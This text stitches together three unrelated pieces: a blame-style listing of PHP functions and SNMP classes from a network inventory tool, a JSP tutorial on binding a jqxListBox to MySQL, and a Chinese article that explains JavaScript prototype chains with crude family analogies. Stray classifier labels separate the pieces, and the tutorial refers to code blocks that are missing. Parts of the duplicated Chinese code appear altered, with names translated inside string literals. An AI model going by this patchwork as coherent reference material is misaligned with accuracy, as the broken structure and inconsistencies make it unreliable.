// when there is a mean to do that. 2232 throw new InvalidRequestArgException ('port_l2address', $db_l2address, 'address belongs to another object'); 2233 } 2234 usePreparedUpdateBlade 2235 ( 2236 'Port', 2237 array 2238 ( 2239 'l2address' => ($db_l2address === '') ? NULL : $db_l2address, 2240 ), 2241 array 2242 ( 2243 'id' => $port_id, 2244 'object_id' => $object_id 2245 ) 2246 ); 2247 $dbxlink->exec ('UNLOCK TABLES'); 2248} /* sg_commitUpdatePortl2address */ 2249 cb15032d 2250/* --------------------------------------------------- */ 2251 2252function sg_commitUpdatePortType($object_id, $port_id, $porttypeid) 2253{ 2254 global $dbxlink; 2255 2256 list($iif_id, $type) = explode("-",$porttypeid); 2257 2258 $dbxlink->exec ('LOCK TABLES Port WRITE'); 2259 usePreparedUpdateBlade 2260 ( 2261 'Port', 2262 array 2263 ( 2264 'iif_id' => ($iif_id === '') ? NULL : $iif_id, 2265 'type' => ($type === '') ? NULL : $type 2266 ), 2267 array 2268 ( 2269 'id' => $port_id, 2270 'object_id' => $object_id 2271 ) 2272 ); 2273 $dbxlink->exec ('UNLOCK TABLES'); 2274} /* sg_commitUpdatePortType */ c7fc6067 2275 2276function sg_commitUpdatePortLabel($object_id, $port_id, $label) 2277{ 2278 global $dbxlink; 2279 2280 $dbxlink->exec ('LOCK TABLES Port WRITE'); 2281 usePreparedUpdateBlade 2282 ( 2283 'Port', 2284 array 2285 ( 2286 'label' => ($label === '') ? NULL : $label 2287 ), 2288 array 2289 ( 2290 'id' => $port_id, 2291 'object_id' => $object_id 2292 ) 2293 ); 2294 $dbxlink->exec ('UNLOCK TABLES'); 2295} /* sg_commitUpdatePortLabel */ 9276dc97 ME 2296/* ----------------------------------------------------- */ 2297 2298/* returns object_id and port_id to a given l2address */ 2299function sg_checkL2Address ($address) 2300{ 2301 $result = usePreparedSelectBlade 2302 ( 2303 'SELECT object_id,id FROM Port WHERE BINARY l2address = ?', 2304 array ($address) 2305 ); 2306 $row = $result->fetchAll(PDO::FETCH_GROUP|PDO::FETCH_UNIQUE|PDO::FETCH_COLUMN); 2307 return $row; 2308} 2309 8188a17c 2310function sg_checkObjectNameUniqueness ($name, $type_id, $object_id = 0) 2311{ 2312 // Some object types do not need unique names 2313 // 1560 - Rack 2314 // 1561 - Row 2315 $dupes_allowed = array (1560, 1561); 2316 if (in_array ($type_id, $dupes_allowed)) 2317 return; 2318 2319 $result = usePreparedSelectBlade 2320 ( 2321 'SELECT COUNT(*) FROM Object WHERE name = ? AND id != ?', 2322 array ($name, $object_id) 2323 ); 2324 $row = $result->fetch (PDO::FETCH_NUM); 2325 if ($row[0] != 0) 2326 return false; 2327 else 2328 return true; 2329} 2330 a2ce4850 2331function sg_detectDeviceBreedByObject($object) 2332{ 2333 global $breed_by_swcode, $breed_by_hwcode, $breed_by_mgmtcode; 2334 2335 foreach ($object['attr'] as $record) 2336 { 2337 if ($record['id'] == 4 and array_key_exists ($record['key'], $breed_by_swcode)) 2338 return $breed_by_swcode[$record['key']]; 2339 elseif ($record['id'] == 2 and array_key_exists ($record['key'], $breed_by_hwcode)) 2340 return $breed_by_hwcode[$record['key']]; 2341 elseif ($record['id'] == 30 and array_key_exists ($record['key'], $breed_by_mgmtcode)) 2342 return $breed_by_mgmtcode[$record['key']]; 2343 } 2344 return ''; 2345} 8188a17c 2346 9276dc97 ME 2347/* ------------------------------------------------------- */ 2348class SNMPgeneric { 2349 2350 protected $host; 2351 protected $version; 2352 2353 /* SNMPv1 and SNMPv2c */ 2354 protected $community; 2355 2356 /* SNMPv3 */ 2357 protected $sec_level; 2358 protected $auth_protocol; 2359 protected $auth_passphrase; 2360 protected $priv_protocol; 2361 protected $priv_passphrase; 2362// protected $contextName; 2363// protected $contextEngineID; 2364 2bfc8235 2365 const VERSION_1 = 0; 2366 const VERSION_2C = 1; 2367 const VERSION_2c = 1; 9276dc97 ME 2368 const VERSION_3 = 3; 2369 2370 protected $result; 2371 2372 function __construct($version, $host, $community) { 30bf198b 2373 9276dc97 2374 $this->host = $host; 2bfc8235 2375 9276dc97 2376 $this->version = $version; 30bf198b 2377 $this->community = $community; 2378 2379 set_error_handler(array($this,'ErrorHandler'), E_WARNING); 9276dc97 ME 2380 } 2381 2382 function setSecurity($sec_level, $auth_protocol = 'md5', $auth_passphrase = '', $priv_protocol = 'des', $priv_passphrase = '') { 2383 $this->sec_level = $sec_level; 2384 $this->auth_protocol = $auth_protocol; 2385 $this->auth_passphrase = $auth_passphrase; 2386 $this->priv_protocol = $priv_protocol; 2387 $this->priv_passphrase = $priv_passphrase; 2bfc8235 2388 2389 return true; 2390 } 2391 2392 function __set($name, $value) 2393 { 2394 switch($name) 2395 { 2396 case 'quick_print': 2397 snmp_set_quick_print($value); 2398 break; 2399 case 'oid_output_format': 2141ed46 2400 /* needs php >= 5.2.0 */ 2bfc8235 2401 snmp_set_oid_output_format($value); 2402 break; 2403 case 'enum_print': 2404 snmp_set_enum_print($value); 2405 break; 2406 case 'valueretrieval': 2407 snmp_set_valueretrieval($value); 2408 break; 2409 default: 2410 $trace = debug_backtrace(); 2411 trigger_error( 2412 'Undefined property via __set(): ' . $name . 2413 ' in ' . $trace[0]['file'] . 2414 ' on line ' . $trace[0]['line'], 2415 E_USER_NOTICE); 2416 return null; 2417 } 9276dc97 ME 2418 } 2419 2420 function walk( $oid, $suffix_as_key = FALSE) { 2421 2422 switch($this->version) { 2423 case self::VERSION_1: 2424 if($suffix_as_key){ 2425 $this->result = snmpwalk($this->host,$this->community,$oid); 2426 } else { 2427 $this->result = snmprealwalk($this->host,$this->community,$oid); 2428 } 2429 break; 2430 2431 case self::VERSION_2C: 2bfc8235 2432 case self::VERSION_2c: 9276dc97 ME 2433 if($suffix_as_key){ 2434 $this->result = snmp2_walk($this->host,$this->community,$oid); 2435 } else { 2436 $this->result = snmp2_real_walk($this->host,$this->community,$oid); 2437 } 2438 break; 2439 2440 case self::VERSION_3: 2441 if($suffix_as_key){ 2442 $this->result = snmp3_walk($this->host,$this->community, $this->sec_level, $this->auth_protocol, $this->auth_passphrase, $this->priv_protocol, $this->priv_passphrase,$oid); 2443 } else { 2444 $this->result = snmp3_real_walk($this->host,$this->community, $this->sec_level, $this->auth_protocol, $this->auth_passphrase, $this->priv_protocol, $this->priv_passphrase,$oid); 2445 } 2446 break; 2447 } 2448 2449 return $this->result; 2450 2451 } 2452 2453 private function __snmpget($object_id) { 2454 2455 $retval = FALSE; 30bf198b 2456 9276dc97 ME 2457 switch($this->version) { 2458 case self::VERSION_1: 2459 $retval = snmpget($this->host,$this->community,$object_id); 2460 break; 2461 2462 case self::VERSION_2C: 2bfc8235 2463 case self::VERSION_2c: 9276dc97 ME 2464 $retval = snmp2_get($this->host,$this->community,$object_id); 2465 break; 2466 2467 case self::VERSION_3: 2468 $retval = snmp3_get($this->host,$this->community, $this->sec_level, $this->auth_protocol, $this->auth_passphrase, $this->priv_protocol, $this->priv_passphrase,$object_id); 2469 break; 2470 } 2471 2472 return $retval; 2473 } 2474 2475 function get($object_id, $preserve_keys = false) { 2476 2477 if(is_array($object_id)) { 2478 2479 if( $preserve_keys ) { 2480 foreach($object_id as $oid) { 2481 $this->result[$oid] = $this->__snmpget($oid); 2482 } 2483 unset($oid); 2484 } else { 2485 foreach($object_id as $oid) { 2486 $result_oid = preg_replace('/.\d$/','',$oid); 2487 $this->result[$result_oid] = $this->__snmpget($oid); 2488 } 2489 unset($oid); 2490 } 2491 } else { 2492 $this->result = $this->__snmpget($object_id); 2493 } 2494 2495 return $this->result; 30bf198b 2496 9276dc97 ME 2497 } 2498 2499 function close() { 2500 } 2501 2502 function getErrno() { 2503 return ($this->result === FALSE); 2504 } 2505 2506 function getError() { 2507 $var = error_get_last(); 2508 return $var['message']; 2509 } 30bf198b 2510 2511 function Errorhandler($errno, $errstr, $errfile, $errline) { 2512 switch(TRUE) { 2513 case (False !== strpos($errstr,'No Such Object available on this agent at this OID')): 2514 /* no further error processing */ 2515 return true; 2516 break; 2517 } 2518 2519 /* proceed with default error handling */ 2520 return false; 2521 } 9276dc97 ME 2522} /* SNMPgeneric */ 2523 2524/* ------------------------------------------------------- */ 2525/* 30bf198b 2526 * SNMP with system OIDs 9276dc97 ME 2527 */ 2528class mySNMP extends SNMPgeneric implements Iterator { 2529 2bfc8235 2530 const SNMP_VERSION = parent::VERSION_2C; 9276dc97 ME 2531 const SNMP_COMMUNITY = 'public'; 2532 2533 public $lastgetoid; 2534 2535 //private $sysInfo; 2536 private $system; 2537 2538 /* is system table available ? */ 2539 private $systemerror = TRUE; 2540 2541 function __construct($version, $host, $community) { 2bfc8235 2542 2543 switch($version) 2544 { 2545 case '1': 2546 case 'v1': 2547 $version = parent::VERSION_1; 2548 break; 2549 case '2': 2550 case 'v2C': 2551 case 'v2c': 2552 $version = parent::VERSION_2c; 2553 break; 2554 case '3': 2555 case 'v3': 2556 $version = parent::VERSION_3; 2557 break; 2558 }; 2559 9276dc97 ME 2560 parent::__construct($version, $host, $community); 2561 9276dc97 2562 /* Return values without SNMP type hint */ 2bfc8235 2563 $this->valueretrieval = SNMP_VALUE_PLAIN; 9276dc97 2564 9276dc97 ME 2565 } /* __construct */ 2566 2567 function init() { 2141ed46 2568 2569 $this->oid_output_format = SNMP_OID_OUTPUT_FULL; 9276dc97 ME 2570 /* .iso.org.dod.internet.mgmt.mib-2.system */ 2571 $this->system = $this->walk(".1.3.6.1.2.1.1"); 2572 2573 $this->systemerror = $this->getErrno() || empty($this->system); 2574 } /* init() */ 2575 2576 /* get value from system cache */ 2577 private function _getvalue($object_id) { 2578 2579 /* TODO better matching */ 2580 2581 if( isset($this->system["SNMPv2-MIB::$object_id"])) { 2582 $this->lastgetoid = "SNMPv2-MIB::$object_id"; 2583 return $this->system["SNMPv2-MIB::$object_id"]; 2584 } else { 2585 if( isset($this->system[".iso.org.dod.internet.mgmt.mib-2.system.$object_id"])) { 2586 $this->lastgetoid = ".iso.org.dod.internet.mgmt.mib-2.system.$object_id"; 2587 return $this->system[".iso.org.dod.internet.mgmt.mib-2.system.$object_id"]; 2588 } else { 2589 if( isset($this->system[$object_id])) { 2590 $this->lastgetoid = $object_id; 2591 return $this->system[$object_id]; 2592 } else { 2593 foreach($this->system as $key => $value) { 2594 if(strpos($key, $object_id)) { 2595 $this->lastgetoid = $key; 2596 return $value; 2597 } 2598 } 2599 unset($key); 2600 unset($value); 2601 } 2602 } 2603 } 2604 2605 return NULL; 2606 } 2607 2608 function get($object_id, $preserve_keys = false) { 2609 2610 if(!$this->systemerror) 2611 $retval = $this->_getvalue($object_id); 2612 else 2613 $retval = NULL; 2614 2615 if($retval === NULL) { 2616 $this->lastgetoid = $object_id; 2617 $retval = parent::get($object_id,$preserve_keys); 2618 } 2619 2620 return $retval; 2621 2622 } /* get */ 2623 2624 function translatetonumeric($oid) { 2625 global $sg_cmd_snmptranslate; 2626 2627 $val = exec(escapeshellcmd($sg_cmd_snmptranslate).' -On '.escapeshellarg($oid), $output, $retval); 2628 2629 if($retval == 0) 2630 return $val; 2631 2632 return FALSE; 2633 2634 } /* translatetonumeric */ 2635/* 2636 function get_new($object_id, $preserve_keys = false) { 2637 $result = parent::get($object_id,$preserve_keys); 2638 return $this->removeDatatype($result); 2639 } 2640 2641 function walk_new($object_id) { 2642 $result = parent::walk($object_id); 2643 return $this->removeDatatype($result); 2644 } 2645 2646*/ 2647 /* use snmp_set_valueretrieval(SNMP_VALUE_PLAIN) instead */ 2648/* function removeDatatype($val) { 2649 return preg_replace('/^\w+: /','',$val); 2650 } 2651*/ 2652 /* make something like $class->sysDescr work */ 2653 function __get($name) { 2654 if($this->systemerror) { 2655 return; 2656 } 30bf198b 2657 9276dc97 ME 2658 $retval = $this->_getvalue($name); 2659 2660 if($retval === NULL) { 2661 2662 $trace = debug_backtrace(); 30bf198b 2663 trigger_error( 2664
__label__pos
0.928114
Bind jqxListBox to MySQL Database using JSP In this help topic you will learn how to bind a jqxListBox to a MySQL database using JSP (JavaServer Pages). Important: before proceeding, please make sure you have followed the instructions of the tutorial Configure MySQL, Eclipse and Tomcat for Use with jQWidgets. 1. Connect to the Database and Retrieve the ListBox Data To populate the listbox, we need a JSP file that connects to the Northwind database and retieves data from it. Create a new JSP by right-clicking the project's WebContent folder, then choosing NewJSP File. Name the file select-data-simple.jsp. Import the necessary classes in the beginning of the JSP: Finally, add a scriptlet to the JSP that does the following: 1. Makes a database connection. 2. Selects the necessary data from the database in a ResultSet. 3. Converts the ResultSet to a JSON array. 4. Prints (returns) the JSON array. 2. Create a Page with a jqxListBox Create a new HTML page by right-clicking the project's WebContent folder, then choosing NewHTML File. Here is the code of the page in our example: Through jqxDataAdapter, the listbox is populated by the data retrieved from the database by select-data-simple.jsp. To run the page, right-click it and select Run AsRun on Server. In the window that appears, select Tomcat v8.0 Server at localhost and click Finish.
__label__pos
0.958816
每次晚上睡不着的时候总喜欢在网上找点原型链 简短狠毒地了然 JS 原型链 2016/05/07 · JavaScript · 1 评论 · 原型链 原稿出处: 茄果    原型链通晓起来有一些绕了,网络资料也是众多,每趟中午睡不着的时候总喜欢在网络找点原型链和闭包的篇章看,效果极好。 毫不纠葛于那一批术语了,那除了令你脑子拧成麻花,真的无法帮您怎么。轻易凶暴点看原型链吧,想点与代码非亲非故的事,比方人、妖以致人妖。 1)人是人她妈生的,妖是妖他妈生的。人和妖都是指标实例,而人她妈和妖他妈正是原型。原型也是指标,叫原型对象。 图片 1 2)人她妈和人她爸做爱能生出一批人小鬼、妖他妈和妖他爸交配能生出一群妖婴儿,交配正是构造函数,俗称造人。 图片 2 3)人她妈会记录滚床单的音讯,所以能够因此人她妈找到滚床单的新闻,也正是说能通过原型对象找到构造函数。 4)人她妈能够生很多珍宝,但那么些小鬼唯有二个阿妈,那正是原型的唯后生可畏性。 5)人她妈也是由人她妈他妈生的,通过人她妈找到人她妈他妈,再通过人她妈他妈找到人她妈他妈……,这么些关系叫做原型链。 图片 3 6)原型链并不是最最的,当你通过人她妈从来往上找,最终发掘你会开掘人他妈他妈他妈……的他妈都不是人,相当于原型链最终指向null。 7)人她妈生的人会有人的旗帜,妖他妈生的妖会有妖的难看,这叫接轨。 图片 4 8)你承接了你妈的肤色,你妈承袭了你妈他妈的肤色,你妈他妈……,那就是原型链的承接。 9)你谈对象了,她妈让您带上房产证去提货,你若未有,那他妈会问你妈有未有,你妈未有那他妈会问您妈她妈有没有……那正是原型链的向上寻觅。 10)你会继续你妈的样子,可是你也足以去染发洗剪吹,即是说对象的质量能够自定义,会覆盖承接获得的品质。 图片 5 11)就算您洗剪吹了染成黄毛了,但您不可能退换你妈的模范,你妈生的兄弟表嫂跟你的黄毛洗剪吹没一点事关,就是说对象实例不能够改动原型的特性。 12)然则你家被您玩火烧了的话,那就是说你家你妈家你弟们家都被烧了,那便是原型属性的分享。 13)你妈小名阿珍,邻居大婶都叫您阿珍儿,但您妈头发从飘柔做成了金毛狮王后,隔壁大婶都改口叫您包租仔,那叫原型的动态性。 图片 6 14)你妈爱美,又跑到南韩整形,整到你妈他妈都认不出来,尽管你妈头发换回飘柔了,但隔壁邻居还是叫你金毛狮王子。因为没人认出你妈,整形后的你妈已经回炉再造了,那便是原型的完整重写。 图片 7 尼玛!你特么也是够了! Don’t BB! Show me the code! function Person (name) { this.name = name; } function Mother () { } Mother.prototype = { //Mother的原型 age: 18, home: ['Beijing', 'Shanghai'] }; Person.prototype = new Mother(); //Person的原型为Mother //用chrome调节和测量试验工具查看,提供了__proto__接口查看原型,这里有两层原型,各位照旧一向看chrome好一些。 var p1 = new Person('杰克'); //p1:'Jack'; __proto__:{__proto__:18,['Beijing','Shanghai']} var p2 = new Person('Mark'); //p2:'Mark'; __proto__:{__proto__:18,['Beijing','Shanghai']} p1.age = 20; /* 实例无法退换原型的核心值属性,正如你洗剪吹染黄毛跟你妈毫不相关 * 在p1实例下扩张七个age属性的家常便饭操作,与原型毫无干系。跟var o={}; o.age=20长期以来。 * p1:上边多了个属性age,而__proto__跟 Mother.prototype一样,age=18。 * p2:唯有属性name,__proto__跟 Mother.prototype一样 */ p1.home[0] = 'Shenzhen'; /* 原型中援引类型属性的分享,正如你烧了你家,正是烧了您全家的家 * 那几个先过,下文再仔细唠叨一下可好? * p1:'Jack',20; __proto__:{__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark'; __proto__:{__proto__:18,['Shenzhen','Shanghai']} */ p1.home = ['Hangzhou', 'Guangzhou']; /* 其实跟p1.age=20同样的操作。换到这么些精通: var o={}; o.home=['big','house'] * p1:'Jack',20,['Hangzhou','Guangzhou']; __proto__:{__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark'; __proto__:{__proto__:18,['Shenzhen','Shanghai']} */ delete p1.age; /* 删除实例的属性之后,原来被蒙蔽的原型值就开云见日了。正如您剃了光头,遗传的摄人心魄小卷发就长出来了。 * 那正是升高寻觅机制,先搜你,然后你妈,再你妈他妈,所以你妈的更动会动态影响你。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark'; __proto__:{__proto__:18,['Shenzhen','Shanghai']} */ Person.prototype.lastName = 'Jin'; /* 改写原型,动态反馈到实例中。正如您妈变新潮了,邻居聊到你都说你妈真潮。 * 注意,这里我们改写的是Person的原型,正是往Mother里加二个lastName属性,等同于Mother.lastName='Jin' * 这里并不是改Mother.prototype,更动不一致的档期的顺序,效果往往会有比相当大的间距。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark'; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} */ Person.prototype = { age: 28, address: { country: 'USA', city: 'Washington' } }; var p3 = new Person('Obama'); /* 重写原型!今年Person的原型已经完全成为两个新的对象了,也正是说Person换了个妈,叫后妈。 * 换成那样明白:var a=10; b=a; a=20; c=a。所以b不改变,变得是c,所以p3跟着后妈变化,与亲妈无关。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark'; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} * p3:'Obama';__proto__: 28 {country: 'USA', city: 'Washington'} */ Mother.prototype.no = 9527; /* 改写原型的原型,动态反馈到实例中。正如您妈他妈变新潮了,邻居提及你都说你丫姑曾外祖母真潮。 * 注意,这里大家改写的是Mother.prototype,p1p2会变,但地点p3跟亲妈已经了无瓜葛了,不影响她。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai'],9527} * p2:'Mark'; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai'],9527} * p3:'Obama';__proto__: 28 {country: 'USA', city: 'Washington'} */ Mother.prototype = { car: 2, hobby: ['run','walk'] }; var p4 = new Person('Tony'); /* 重写原型的原型!那年Mother的原型已经完全成为三个新的靶子了!人她妈换了个后妈! * 由于地点Person与Mother已经断开联系了,那时候Mother怎么变已经不影响Person了。 * p4:'Tony';__proto__: 28 {country: 'USA', city: 'Washington'} */ Person.prototype = new Mother(); //再度绑定 var p5 = new Person('Luffy'); // 那一年借使须要动用那个改造的话,那将在双重将Person的原型绑到mother上了 // p5:'Luffy';__proto__:{__proto__: 2, ['run','walk']} p1.__proto__.__proto__.__proto__.__proto__ //null,你说原型链的极端不是null? Mother.__proto__.__proto__.__proto__ //null,你说原型链的终端不是null? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 function Person (name) { this.name = name; } function Mother () { } Mother.prototype = {    //Mother的原型     age: 18,     home: ['Beijing', 'Shanghai'] }; Person.prototype = new Mother(); //Person的原型为Mother   //用chrome调试工具查看,提供了__proto__接口查看原型,这里有两层原型,各位还是直接看chrome好一点。 var p1 = new Person('Jack'); //p1:'Jack'; __proto__:{__proto__:18,['Beijing','Shanghai']} var p2 = new Person('Mark'); //p2:'Mark'; __proto__:{__proto__:18,['Beijing','Shanghai']}   p1.age = 20;   /* 实例不能改变原型的基本值属性,正如你洗剪吹染黄毛跟你妈无关 * 在p1实例下增加一个age属性的普通操作,与原型无关。跟var o={}; o.age=20一样。 * p1:下面多了个属性age,而__proto__跟 Mother.prototype一样,age=18。 * p2:只有属性name,__proto__跟 Mother.prototype一样 */   p1.home[0] = 'Shenzhen'; /* 原型中引用类型属性的共享,正如你烧了你家,就是烧了你全家的家 * 这个先过,下文再仔细唠叨一下可好? * p1:'Jack',20; __proto__:{__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark';    __proto__:{__proto__:18,['Shenzhen','Shanghai']} */   p1.home = ['Hangzhou', 'Guangzhou']; /* 其实跟p1.age=20一样的操作。换成这个理解: var o={}; o.home=['big','house'] * p1:'Jack',20,['Hangzhou','Guangzhou']; __proto__:{__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark';                             __proto__:{__proto__:18,['Shenzhen','Shanghai']} */   delete p1.age;     /* 删除实例的属性之后,原本被覆盖的原型值就重见天日了。正如你剃了光头,遗传的迷人小卷发就长出来了。 * 这就是向上搜索机制,先搜你,然后你妈,再你妈他妈,所以你妈的改动会动态影响你。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark';                          __proto__:{__proto__:18,['Shenzhen','Shanghai']} */     Person.prototype.lastName = 'Jin'; /* 改写原型,动态反应到实例中。正如你妈变新潮了,邻居提起你都说你妈真潮。 * 注意,这里我们改写的是Person的原型,就是往Mother里加一个lastName属性,等同于Mother.lastName='Jin' * 这里并不是改Mother.prototype,改动不同的层次,效果往往会有很大的差异。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark';                          __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} */   Person.prototype = {     age: 28,     address: { country: 'USA', city: 'Washington' } }; var p3 = new Person('Obama'); /* 重写原型!这个时候Person的原型已经完全变成一个新的对象了,也就是说Person换了个妈,叫后妈。 * 换成这样理解:var a=10; b=a; a=20; c=a。所以b不变,变得是c,所以p3跟着后妈变化,与亲妈无关。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} * p2:'Mark';                          __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai']} * p3:'Obama';__proto__: 28 {country: 'USA', city: 'Washington'} */     Mother.prototype.no = 9527; /* 改写原型的原型,动态反应到实例中。正如你妈他妈变新潮了,邻居提起你都说你丫外婆真潮。 * 注意,这里我们改写的是Mother.prototype,p1p2会变,但上面p3跟亲妈已经了无瓜葛了,不影响他。 * p1:'Jack',['Hangzhou','Guangzhou']; __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai'],9527} * p2:'Mark';                          __proto__:{'jin',__proto__:18,['Shenzhen','Shanghai'],9527} * p3:'Obama';__proto__: 28 {country: 'USA', city: 'Washington'} */   Mother.prototype = {     car: 2,     hobby: ['run','walk'] }; var p4 = new Person('Tony'); /* 重写原型的原型!这个时候Mother的原型已经完全变成一个新的对象了!人他妈换了个后妈! * 由于上面Person与Mother已经断开联系了,这时候Mother怎么变已经不影响Person了。 * p4:'Tony';__proto__: 28 {country: 'USA', city: 'Washington'} */ Person.prototype = new Mother(); //再次绑定 var p5 = new Person('Luffy'); // 这个时候如果需要应用这些改动的话,那就要重新将Person的原型绑到mother上了 // p5:'Luffy';__proto__:{__proto__: 2, ['run','walk']}   p1.__proto__.__proto__.__proto__.__proto__ //null,你说原型链的终点不是null? Mother.__proto__.__proto__.__proto__    //null,你说原型链的终点不是null? 看完基本能明了了呢? 今日再来讲说 p1.age = 20、p1.home = [‘Hangzhou’, ‘Guangzhou’] 和  p1.home[0] = ‘Shenzhen’ 的区别。 p1.home[0] = ‘Shenzhen’;  计算一下是 p1.object.method,p1.object.property 那样的花样。 p1.age = 20;  p1.home = [‘Hangzhou’, ‘Guangzhou’];这两句如故比较好精通的,先忘记原型吧,想想我们是怎么为二个日常性对象扩充质量的: var obj = new Object(); obj.name='xxx'; obj.num = [100, 200]; 1 2 3 var obj = new Object(); obj.name='xxx'; obj.num = [100, 200]; 那般是或不是就通晓了吗?同样同样的哟。 那为啥 p1.home[0] = ‘Shenzhen’ 不会在 p1 下创办多少个 home 数组属性,然后将其第4位设为 ‘Shenzhen’呢? 大家仍旧先忘了那个,想想上面包车型地铁obj对象,假如写成那样: var obj.name = ‘xxx’, obj.num = [100, 200],能收获你要的结果吧? 鲜明,除了报错你怎么都得不到。因为obj还未定义,又怎么能往里面参预东西吧?同理,p1.home[0]中的 home 在 p1 下并未有被定义,所以也不能够直接一步定义 home[0] 了。借使要在p1下创立四个 home 数组,当然是如此写了: p1.home = []; p1.home[0] = 'Shenzhen'; 1 2 p1.home = []; p1.home[0] = 'Shenzhen'; 那不正是我们最常用的艺术呢? 而之所以 p1.home[0] = ‘Shenzhen’ 不直接报错,是因为在原型链中有多个寻觅机制。当大家输入 p1.object 的时候,原型链的搜寻机制是先在实例中搜寻相应的值,找不到就在原型中找,还找不到就再往上拔尖原型中查找……一向到了原型链的顶峰,正是到null还没找到的话,就赶回一个undefined。当大家输入 p1.home[0] 的时候,也是一样的追寻机制,先物色 p1 看有没出名为 home 的习性和措施,然后逐级提升查找。最终大家在Mother的原型里面找到了,所以修改他就一定于修改了 Mother 的原型啊。 一句话回顾:p1.home[0] = ‘Shenzhen’  等同于  Mother.prototype.home[0] = ‘Shenzhen’。 由地方的深入分析可知,原型链承继的重要性难题在于属性的分享,非常多时候我们只想分享方法而并不想要分享属性,理想中每一个实例应该有独立的性情。故而,原型承接就有了上面包车型地铁三种改良格局: 1)组合承继 function Mother (age) { this.age = age; this.hobby = ['running','football'] } Mother.prototype.showAge = function () { console.log(this.age); }; function Person (name, age) { Mother.call(this, age);  //第二遍进行 this.name = name; } Person.prototype = new Mother();  //第叁遍履行Person.prototype.constructor = Person; Person.prototype.showName = function () { console.log(this.name); } var p1 = new Person('杰克', 20); p1.hobby.push('basketball'); //p1:'Jack'; __proto__:20,['running','football'] var p2 = new Person('Mark', 18); //p2:'Mark'; __proto__:18,['running','football'] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 function Mother (age) {     this.age = age;     this.hobby = ['running','football'] } Mother.prototype.showAge = function () {     console.log(this.age); };   function Person (name, age) {     Mother.call(this, age);  //第二次执行     this.name = name; } Person.prototype = new Mother();  //第一次执行 Person.prototype.constructor = Person; Person.prototype.showName = function () {     console.log(this.name); }   var p1 = new Person('Jack', 20); p1.hobby.push('basketball');  //p1:'Jack'; __proto__:20,['running','football'] var p2 = new Person('Mark', 18);  //p2:'Mark'; __proto__:18,['running','football'] 结果是酱紫的: 图片 8  图片 9 此处首先次举行的时候,获得 Person.prototype.age = undefined, Person.prototype.hobby = [‘running’,’football’],第壹回施行也正是 var p1 = new Person(‘Jack’, 20) 的时候,获得 p1.age =20, p1.hobby = [‘running’,’football’],push后就形成了 p1.hobby = [‘running’,’football’, ‘basketball’]。其实分辨好 this 的成形,掌握起来也是比较容易的,把 this 轻便替换一下就能够收获那么些结果了。 若是以为明白起来比较绕的话,试着把脑子里面包车型地铁定义扔掉吧,把本人当浏览器从上到下实施壹遍代码,结果是还是不是就出去了吗? 透过第三次实行原型的构造函数 Mother(),大家在目的实例中复制了如日中天份原型的性格,那样就瓜熟蒂落了与原型属性的分开独立。留神的您会发觉,大家第贰次调用 Mother(),好像什么用都未有啊,能不调用他啊?能够,就有了上面包车型地铁寄生组合式承接。 2)寄生组合式承接 function object(o){ function F(){} F.prototype = o; return new F(); } function inheritPrototype(Person, Mother){ var prototype = object(Mother.prototype); prototype.constructor = Person; Person.prototype = prototype; } function Mother (age) { this.age = age; this.hobby = ['running','football'] } Mother.prototype.showAge = function () { console.log(this.age); }; function Person (name, age) { Mother.call(this, age); this.name = name; } inheritPrototype(Person, Mother); Person.prototype.showName = function () { console.log(this.name); } var p1 = new Person('Jack', 20); p1.hobby.push('basketball');//p1:'Jack'; __proto__:20,['running','football'] var p2 = new Person('Mark', 18); //p2:'Mark'; __proto__:18,['running','football'] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 function object(o){     function F(){}     F.prototype = o;     return new F(); }   function inheritPrototype(Person, Mother){     var prototype = object(Mother.prototype);     prototype.constructor = Person;         Person.prototype = prototype;     }                          function Mother (age) {     this.age = age;     this.hobby = ['running','football'] } Mother.prototype.showAge = function () {     console.log(this.age); };   function Person (name, age) {     Mother.call(this, age);     this.name = name; }   inheritPrototype(Person, Mother);   Person.prototype.showName = function () {     console.log(this.name); }   var p1 = new Person('Jack', 20); p1.hobby.push('basketball');//p1:'Jack'; __proto__:20,['running','football'] var p2 = new Person('Mark', 18); //p2:'Mark'; __proto__:18,['running','football'] 结果是酱紫的: 图片 10 图片 11 原型中不再有 age 和 hobby 属性了,唯有七个主意,便是大家想要的结果! 关键点在于 object(o) 里面,这里借用了二个有的时候对象来都行防止了调用new Mother(),然后将原型为 o 的新对象实例重返,从而形成了原型链的安装。很绕,对吧,那是因为我们不可能直接设置 Person.prototype = Mother.prototype 啊。 小结 